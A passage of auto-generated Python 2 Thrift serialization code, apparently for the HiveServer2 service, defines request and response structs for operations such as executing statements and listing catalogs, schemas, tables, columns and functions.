oprot.writeFieldBegin('runAsync', TType.BOOL, 4)
oprot.writeBool(self.runAsync)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
if self.statement is None:
raise TProtocol.TProtocolException(message='Required field statement is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TExecuteStatementResp(object):
"""
Attributes:
- status
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
)
def __init__(self, status=None, operationHandle=None,):
self.status = status
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TExecuteStatementResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetTypeInfoReq(object):
"""
Attributes:
- sessionHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
)
def __init__(self, sessionHandle=None,):
self.sessionHandle = sessionHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetTypeInfoReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetTypeInfoResp(object):
"""
Attributes:
- status
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
)
def __init__(self, status=None, operationHandle=None,):
self.status = status
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetTypeInfoResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetCatalogsReq(object):
"""
Attributes:
- sessionHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
)
def __init__(self, sessionHandle=None,):
self.sessionHandle = sessionHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetCatalogsReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetCatalogsResp(object):
"""
Attributes:
- status
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
)
def __init__(self, status=None, operationHandle=None,):
self.status = status
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetCatalogsResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetSchemasReq(object):
"""
Attributes:
- sessionHandle
- catalogName
- schemaName
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
(2, TType.STRING, 'catalogName', None, None, ), # 2
(3, TType.STRING, 'schemaName', None, None, ), # 3
)
def __init__(self, sessionHandle=None, catalogName=None, schemaName=None,):
self.sessionHandle = sessionHandle
self.catalogName = catalogName
self.schemaName = schemaName
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.catalogName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.schemaName = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetSchemasReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
if self.catalogName is not None:
oprot.writeFieldBegin('catalogName', TType.STRING, 2)
oprot.writeString(self.catalogName)
oprot.writeFieldEnd()
if self.schemaName is not None:
oprot.writeFieldBegin('schemaName', TType.STRING, 3)
oprot.writeString(self.schemaName)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetSchemasResp(object):
"""
Attributes:
- status
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
)
def __init__(self, status=None, operationHandle=None,):
self.status = status
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetSchemasResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetTablesReq(object):
"""
Attributes:
- sessionHandle
- catalogName
- schemaName
- tableName
- tableTypes
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
(2, TType.STRING, 'catalogName', None, None, ), # 2
(3, TType.STRING, 'schemaName', None, None, ), # 3
(4, TType.STRING, 'tableName', None, None, ), # 4
(5, TType.LIST, 'tableTypes', (TType.STRING,None), None, ), # 5
)
def __init__(self, sessionHandle=None, catalogName=None, schemaName=None, tableName=None, tableTypes=None,):
self.sessionHandle = sessionHandle
self.catalogName = catalogName
self.schemaName = schemaName
self.tableName = tableName
self.tableTypes = tableTypes
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.catalogName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.schemaName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.tableName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.LIST:
self.tableTypes = []
(_etype139, _size136) = iprot.readListBegin()
for _i140 in xrange(_size136):
_elem141 = iprot.readString();
self.tableTypes.append(_elem141)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetTablesReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
if self.catalogName is not None:
oprot.writeFieldBegin('catalogName', TType.STRING, 2)
oprot.writeString(self.catalogName)
oprot.writeFieldEnd()
if self.schemaName is not None:
oprot.writeFieldBegin('schemaName', TType.STRING, 3)
oprot.writeString(self.schemaName)
oprot.writeFieldEnd()
if self.tableName is not None:
oprot.writeFieldBegin('tableName', TType.STRING, 4)
oprot.writeString(self.tableName)
oprot.writeFieldEnd()
if self.tableTypes is not None:
oprot.writeFieldBegin('tableTypes', TType.LIST, 5)
oprot.writeListBegin(TType.STRING, len(self.tableTypes))
for iter142 in self.tableTypes:
oprot.writeString(iter142)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetTablesResp(object):
"""
Attributes:
- status
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
)
def __init__(self, status=None, operationHandle=None,):
self.status = status
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetTablesResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetTableTypesReq(object):
"""
Attributes:
- sessionHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
)
def __init__(self, sessionHandle=None,):
self.sessionHandle = sessionHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetTableTypesReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetTableTypesResp(object):
"""
Attributes:
- status
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
)
def __init__(self, status=None, operationHandle=None,):
self.status = status
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetTableTypesResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetColumnsReq(object):
"""
Attributes:
- sessionHandle
- catalogName
- schemaName
- tableName
- columnName
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
(2, TType.STRING, 'catalogName', None, None, ), # 2
(3, TType.STRING, 'schemaName', None, None, ), # 3
(4, TType.STRING, 'tableName', None, None, ), # 4
(5, TType.STRING, 'columnName', None, None, ), # 5
)
def __init__(self, sessionHandle=None, catalogName=None, schemaName=None, tableName=None, columnName=None,):
self.sessionHandle = sessionHandle
self.catalogName = catalogName
self.schemaName = schemaName
self.tableName = tableName
self.columnName = columnName
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.catalogName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.schemaName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.tableName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.columnName = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetColumnsReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
if self.catalogName is not None:
oprot.writeFieldBegin('catalogName', TType.STRING, 2)
oprot.writeString(self.catalogName)
oprot.writeFieldEnd()
if self.schemaName is not None:
oprot.writeFieldBegin('schemaName', TType.STRING, 3)
oprot.writeString(self.schemaName)
oprot.writeFieldEnd()
if self.tableName is not None:
oprot.writeFieldBegin('tableName', TType.STRING, 4)
oprot.writeString(self.tableName)
oprot.writeFieldEnd()
if self.columnName is not None:
oprot.writeFieldBegin('columnName', TType.STRING, 5)
oprot.writeString(self.columnName)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetColumnsResp(object):
"""
Attributes:
- status
- operationHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
)
def __init__(self, status=None, operationHandle=None,):
self.status = status
self.operationHandle = operationHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.operationHandle = TOperationHandle()
self.operationHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetColumnsResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.operationHandle is not None:
oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
self.operationHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetFunctionsReq(object):
"""
Attributes:
- sessionHandle
- catalogName
- schemaName
- functionName
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
(2, TType.STRING, 'catalogName', None, None, ), # 2
(3, TType.STRING, 'schemaName', None, None, ), # 3
(4, TType.STRING, 'functionName', None, None, ), # 4
)
def __init__(self, sessionHandle=None, catalogName=None, schemaName=None, functionName=None,):
self.sessionHandle = sessionHandle
self.catalogName = catalogName
self.schemaName = schemaName
self.functionName = functionName
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
